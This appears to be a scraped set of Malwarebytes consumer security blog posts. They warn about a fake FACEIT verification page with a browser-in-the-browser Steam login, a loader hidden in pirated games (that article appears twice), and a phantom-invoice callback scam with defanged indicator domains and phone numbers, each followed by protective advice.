      To use FACEIT, players typically connect their Steam platform accounts, which are valuable for scammers.

      A stolen Steam account can contain:

      • Hundreds or thousands of dollars’ worth of purchased games
      • Valuable CS2 skins and items, some worth significant amounts of real money
      • Wallet funds and saved payment methods
      • Years of friends, messages, and community reputation

      Once criminals gain access, they can steal items, scam friends, or sell the account on criminal marketplaces.

      Because FACEIT connects to Steam, a fake “FACEIT verification” page is an easy way to trick people. Victims think they’re updating their account, but attackers are really trying to steal Steam accounts that may contain valuable games, skins, and wallet funds. Gamers are especially vulnerable because they’re used to linking accounts and following verification steps, and may act quickly if they think their access to a game is at risk.

      How the scam works

      The attack starts with a website that looks like an official FACEIT page. The scam pages are likely distributed through the same channels gamers use every day: community forums, chat servers, social media posts, and direct messages.

      The page claims FACEIT is offering free, optional identity verification to help build a more trusted community. It’s polished, uses the correct branding, and even includes working links to FACEIT’s real blog and support pages. Everything about it is designed to make you think you’re on a genuine FACEIT website, but you’re not.

      Fake FACEIT verification page
      Fake FACEIT verification page

      Instead of using the official faceit.com domain, the scammers use lookalike addresses such as:

      • faceit-discord.com
      • faceit-clubs-verify.com
      • faceit-verification-clubs.com

      The extra words like “verification” or “discord,” are designed to make these addresses look legitimate at a glance, but they’re sites that are controlled by cybercriminals.

      Many of these domains are only days or even hours old. Scammers constantly register new ones, knowing they’ll likely be blocked eventually. That’s why a site not being flagged as dangerous doesn’t mean it’s safe.

      There are small clues, though. In one example, the page listed both “Copyright 2024” and “Copyright 2025.” Legitimate companies rarely make mistakes like that, but scam sites often do.

      After the verification pitch, the page claims there’s a problem with your CS2 account and asks you to update your information to prove you’re not a cheater or using a smurf account.

      Here’s the clever part. The QR code appears blurry and difficult to scan. Researchers believe that’s intentional. After a few failed attempts, many users are likely to give up and click the easier-looking “Sign in through Steam” button instead.

      The broken QR code is the nudge that guides victims toward the part of the page where the real theft happens.

      Fake FACEIT page with a blurry QR code and "Sign in with Steam" button
      Fake FACEIT page with a blurry QR code and “Sign in with Steam” button

      When users eventually give up on the QR code and click the button, a Steam login window appears. It looks convincing, complete with the Steam logo, login fields, and what appears to be a steamcommunity.com address bar.

      But the window is fake.

      Fake Steam sign-in window steals your account details
      Fake Steam sign-in window steals your account details

      Instead of opening a real Steam login page, the scammers display a convincing copy inside the website itself. Security researchers call this a Browser-in-the-Browser attack. The fake window looks and behaves like a genuine browser pop-up, but the address bar is just part of the image.

      Anything entered into the form goes straight to the criminals. If the page also asks for a Steam Guard code, that gets stolen too, allowing attackers to access the account. Some victims are then tricked into “protecting” their items by transferring them to a friend or backup account, when they’re actually sending them directly to the scammers.

      How to protect yourself against this scam

      A few simple habits can stop this scam:

      • Check the real address bar. FACEIT’s official website is faceit.com. Be wary of lookalike domains such as faceit-discord.com or faceit-clubs-verify.com. Remember: a login window inside a webpage can fake its own address bar. Trust the one at the top of your browser, not the one inside the page.
      • Be suspicious of blurry QR codes. Researchers believe the QR code in this scam is deliberately blurred to push users toward the “Sign in through Steam” button instead.
      • Treat urgency as a warning sign. Messages about account problems, verification, or losing access are designed to make you act quickly. Slow down and verify first.
      • Go to the source. If you’re unsure whether FACEIT or Steam needs something from you, open the official website or app yourself rather than following links from Discord, messages, or ads.
      • Add another layer of protection. Scam sites often look legitimate. Malwarebytes Browser Guard can help block known phishing pages and other online scams before you enter your username and password.

      If you already entered your details

      Change your Steam password immediately, make sure Steam Guard is enabled, and sign out of all other devices. Check your Steam API key settings and remove any key you don’t recognize. Change the password anywhere else you reused it and review your account for unauthorized trades or purchases.

      Why this scam works

      This scam works because it doesn’t look like a scam. The branding is convincing, the story makes sense, and even the Steam login window appears legitimate.

      Most people know to check the address bar before entering a password. Browser-in-the-Browser attacks are designed to defeat that habit. Because the fake Steam window is built into the page itself, the criminals can make its address bar say whatever they want, including steamcommunity.com.

      The safest approach is to be suspicious of any login window that appears inside another website. If you’re unsure, close the page and sign in to Steam the way you normally would, through the official app or by typing the address yourself.

      That small pause, that refusal to take the convenient shortcut a page is pushing you toward, is all it takes to keep your account yours.


      Stop threats before they can do any harm.

      Malwarebytes Browser Guard blocks phishing pages and malicious sites automatically. Free, one click to install. Add it to your browser →

      •  

      Pirated PC games are delivering password-stealing malware

      A new Windows malware campaign hides inside pirated PC games and modified installers for franchises like Far Cry, Need for Speed, FIFA, and Assassin’s Creed.

      Researchers estimate that more than 400,000 devices worldwide have been infected, with around 30,000 users in the US.

      The infection method is simple and effective. Users are lured into installing a fully functional free game. While the cracked and repacked game appears to work, the malware installs silently in the background.

      The strain is being called “RenEngine loader” and sometimes referred to as Ren’Py because parts of the malicious code are embedded in a legitimate Ren’Py launcher used to run some visual novel games. When the launcher runs, it decompresses the game files and secretly starts the infection chain.

      Ren’Py is a legitimate, open-source visual novel engine used by developers to make story-driven games with text, images, sound, and interactive choices. The malware in this case is not Ren’Py itself. Attackers are abusing the engine or its launcher as a delivery method to hide malicious code inside pirated game installs.

      In practice, the primary infection vector is software piracy. Victims download cracked games or repacked installers from unofficial sites, then run what looks like a normal game launcher or setup file. In reality, they’re infecting their computer with a malware loader.

      At the time of writing, this loader is trying to deliver an infostealer called ARC, which can grab saved browser passwords, cookies, cryptocurrency wallets, autofill data, system details, and clipboard contents.

      But we’ve also seen other payloads being dropped, including Rhadamanthys stealer, Async Remote Access Trojan (RAT), and Backdoor.XWorm, which can expand the damage from credential theft to full remote control of the machine. That can mean account takeovers, financial fraud, crypto theft, and deeper compromise of personal or work data.

      Worst of all, a user may not realize they are infected until usernames and passwords have been stolen or the machine starts behaving strangely. 

      How to stay safe

      The most important lesson here is that “free” cracked software is often a delivery mechanism for malware, not a bargain. Once a loader like this is on the machine, the real goal is usually to steal credentials or install a secondary payload that is more persistent and more damaging.

      Some other general advice to stay safe:

      • Don’t download installers from unofficial sources.
      • Use real-time, up-to-date anti-malware protection to block loaders.
      • Keep your software up to date, especially Microsoft patches and other security-related programs.

      If you think your computer is infected and want to make sure, follow the instructions posted here. The amazing volunteers on our forums will help you through the process of cleaning your machine.


      We don’t just report on threats—we remove them

      Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

      •  

      Pirated PC games are delivering password-stealing malware

      A new Windows malware campaign hides inside pirated PC games and modified installers for franchises like Far Cry, Need for Speed, FIFA, and Assassin’s Creed.

      Researchers estimate that more than 400,000 devices worldwide have been infected, with around 30,000 users in the US.

      The infection method is simple and effective. Users are lured into installing a fully functional free game. While the cracked and repacked game appears to work, the malware installs silently in the background.

      The strain is being called “RenEngine loader” and sometimes referred to as Ren’Py because parts of the malicious code are embedded in a legitimate Ren’Py launcher used to run some visual novel games. When the launcher runs, it decompresses the game files and secretly starts the infection chain.

      Ren’Py is a legitimate, open-source visual novel engine used by developers to make story-driven games with text, images, sound, and interactive choices. The malware in this case is not Ren’Py itself. Attackers are abusing the engine or its launcher as a delivery method to hide malicious code inside pirated game installs.

      In practice, the primary infection vector is software piracy. Victims download cracked games or repacked installers from unofficial sites, then run what looks like a normal game launcher or setup file. In reality, they’re infecting their computer with a malware loader.

      At the time of writing, this loader is trying to deliver an infostealer called ARC, which can grab saved browser passwords, cookies, cryptocurrency wallets, autofill data, system details, and clipboard contents.

      But we’ve also seen other payloads being dropped, including Rhadamanthys stealer, Async Remote Access Trojan (RAT), and Backdoor.XWorm, which can expand the damage from credential theft to full remote control of the machine. That can mean account takeovers, financial fraud, crypto theft, and deeper compromise of personal or work data.

      Worst of all, a user may not realize they are infected until usernames and passwords have been stolen or the machine starts behaving strangely. 

      How to stay safe

      The most important lesson here is that “free” cracked software is often a delivery mechanism for malware, not a bargain. Once a loader like this is on the machine, the real goal is usually to steal credentials or install a secondary payload that is more persistent and more damaging.

      Some other general advice to stay safe:

      • Don’t download installers from unofficial sources.
      • Use real-time, up-to-date anti-malware protection to block loaders.
      • Keep your software up to date, especially Microsoft patches and other security-related programs.

      If you think your computer is infected and want to make sure, follow the instructions posted here. The amazing volunteers on our forums will help you through the process of cleaning your machine.


      We don’t just report on threats—we remove them

      Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

      •  

      We found this fake-invoice campaign while scammers were still building it

      A new batch of fake payment invoices is being staged right now, and we caught the campaign while it was still being put together. The emails impersonate PayPal, Amazon, and Geek Squad, and others, and they all share one goal: to scare you into calling a phone number where a fake “support agent” is waiting.

      What makes this wave unusual is that some of the templates we recovered still contained blank fields where the phone number and price should have been, while others were already complete and in circulation. We caught the campaign mid-rollout.

      What’s the scam?

      If you receive an email that looks like a receipt—“Your subscription renewed for $349,” “You sent a payment of $598.96”—and it tells you to call a number to cancel or dispute the charge, stop.

      There is no charge. The email exists to get you on the phone with a scammer who will then try to talk you into handing over remote access to your computer, your card details, or a “refund” that somehow requires you to send them money.

      This particular flavor is called a “phantom invoice” or “refund” scam, and the trick is psychological, not technical. That’s why these emails can often slip past spam filters: there’s often no malicious attachment or link for security systems to analyze. The scam is in the phone number you’re urged to call.

      If you didn’t make the purchase, there’s no need to call the number in the email to cancel it. Real companies don’t pressure customers into resolving unexpected charges through unsolicited phone numbers.

      The goal is simple: create enough concern to get you to call. You see a significant charge you don’t recognize, say $499, and your first instinct is to stop it. The invoice helpfully provides a number to call “if this wasn’t you.” So you call, and now you’re talking to the scammer.

      From there, the conversation usually leads to one of a few outcomes. They may ask you to install software so they can “fix” the charge, giving them access to your computer. They may ask for your card or bank details to “process the refund.” Or they may “accidentally” refund too much and ask you to send the difference back, usually by gift card or bank transfer.

      The invoice is just the bait, while the phone call is the trap.

      These emails are convincing, and some are already reaching inboxes. The good news is that simply receiving one doesn’t put you at risk. The scam only works if it succeeds in getting you to call the number provided. If you recognize the message as fraudulent and delete it, the attack stops there.

      If you did call the number and followed instructions from a scammer, run a virus scan and check your bank accounts. Change your critical passwords, enable multi-factor authentication (MFA), and make sure your security software is up to date.

      How we caught it half-built

      Most scam investigations start after the damage is done. This one was different. We came across a cluster of nearly identical invoice templates that were clearly part of the same kit, and several of them were incomplete.

      Where a finished scam email would show a phone number, some of these showed the literal text #TFN# instead, which is just a placeholder. (“TFN” is the scammers’ shorthand for toll-free number, the callback line they route victims to.) Others left the price as #PRICE#, the date as #DATE#, and the recipient as #EMAIL#. These are merge fields—the blanks a bulk-sending tool fills in automatically before a campaign goes out.

      Finding those placeholders still in place told us that the operation was still being assembled. Some templates were still half-finished, while others were already complete and carrying live callback numbers. We’d caught the campaign mid-rollout, between being built and fully launched.

      Why these invoices look believable

      The scammers use familiar brands such as PayPal, Amazon, and Geek Squad. They’re companies people expect to receive receipts and renewal notices from, which lowers suspicion.

      The charges are also carefully chosen. Amounts in the few-hundred-dollar range are large enough to cause concern but still seem plausible as a subscription renewal or online purchase.

      Many messages add urgency, telling recipients to call quickly to dispute or cancel the charge. This pressure is designed to stop people from verifying the transaction independently.

      Some invoices even combine trusted brands, such as claiming a payment was sent through PayPal to Amazon. Referencing multiple well-known companies makes the message appear more credible.

      How to spot a fake invoice

      The good news is that these scams share warning signs. Once you know what to look for, they get a lot easier to catch. Watch for any of these:

      • A charge you don’t remember making. If you don’t recognize the charge, verify it independently through your account or bank. If there’s no record of it, the invoice is likely a lure designed to get you to call.
      • A ticking clock. “Call within 12 hours,” “cancel before it renews,” or “act immediately” provide fake urgency designed to stop you thinking. Real billing problems can wait while you check.
      • Brands you trust, used as cover. The more familiar the logo, the less carefully people read. Scammers borrow trust they didn’t earn.
      • Odd details that don’t quite fit. A PayPal email “from” Amazon, a stray address that belongs to no one, or slightly off wording. Trust the small things that feel wrong.
      • Pressure to keep you on the phone. Once you call, a real company would never stop you from hanging up to verify, but a scammer will.

      If even one of these is present, treat the whole message as suspicious.

      Remember the single rule that defeats this entire scam: A genuine company will never rush you onto a call to undo a payment you never made. If you’re not sure whether a charge is real, close the email and check your account the normal way: by typing the company’s website into your browser yourself, or calling the number on the back of your bank card.

      Pro tip: Malwarebytes Scam Guard can help spot scams like these and guide you in what to do next, while Browser Guard will block you from accessing scam websites.

      What to do if one of these lands in your inbox

      If you receive a suspicious invoice like the ones described here, take a few simple precautions:

      • Don’t call the number. That’s the core of the scam. Legitimate refunds or cancellations don’t require you to call a number from an unsolicited receipt.
      • Don’t reply or click anything. Treat the message as suspicious, even if it looks legitimate.
      • Verify charges independently. If you’re concerned a charge might be real, log in directly to PayPal, your bank, or the retailer by typing the address yourself and reviewing your transaction history.
      • Report it. Forward suspected phishing emails to the impersonated company’s abuse address and, in the US, report them to the FTC at reportfraud.ftc.gov. Reporting helps disrupt scam operations.
      • If you already called, end the conversation. Don’t install any software they recommend. If you granted remote access or shared payment information, contact your bank immediately and run a trusted security scan on your device.
      • Be wary of urgency. Phrases like “within 12 hours” or “cancel now” are designed to pressure you into acting before you think. Take the time to verify the claim independently.

      Scammers are increasingly shifting to tactics that software can’t easily inspect. A phone number in an email is difficult for security tools to evaluate, and the actual scam happens over a phone call instead of through a malicious link or attachment.

      That’s why finding this campaign during rollout matters. Instead of seeing the damage afterward, we got a look at the preparation: unfinished templates, incomplete details, and the scam kit before it was fully deployed.

      The best defense is simple: if an unexpected invoice tells you to call a number immediately, stop and verify the charge independently first.

      Indicators of compromise

      Domains

      invoicepdfin[.]xyz

      invoicepdfus[.]xyz

      invoicepdfusa[.]xyz

      invoicerep[.]xyz

      invoicestatement[.]xyz

      invoicestm[.]xyz

      Callback numbers

      804-392-2793

      801-640-8589


      Something feel off? Check it before you click.  

      Malwarebytes Scam Guard helps you analyze suspicious links, texts, and screenshots instantly.  

      Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.  

      Try it free → 

      •  
      ❌